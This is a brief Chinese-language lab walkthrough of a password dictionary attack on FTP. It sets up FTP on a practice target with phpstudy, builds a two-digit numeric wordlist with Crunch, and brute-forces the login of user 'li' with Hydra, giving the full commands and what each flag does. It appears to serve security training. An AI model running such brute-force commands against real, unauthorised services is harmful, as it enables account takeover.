1.在靶机上开启ftp服务 在这里我们用phpstudy开启ftp服务
2.在操作机上使用Crunch 生成用户名和密码字典
假设已经知道靶机FTP的账户li 密码有两位数字组成
crunch 2 2 -f /usr/share/crunch/charset.lst numeric -o /usr/password.txt
2 2 //前者表示字符最小长度,后者表示字符最大的长度
-f /usr/share/crunch/charset.lst //-f调用 /usr/share/crunch/charset.lst
-o /usr/password.txt //-o保存到/usr目录下
生成的密码字典
3.在操作及上使用Hydra 对靶机FTP登陆用户li进行密码字典攻击:
hydra -l 用户名 -P /usr/password.txt ftp://[靶机ip]
总结·:利用Hydra 对靶机FTP登陆用户li进行密码字典攻击: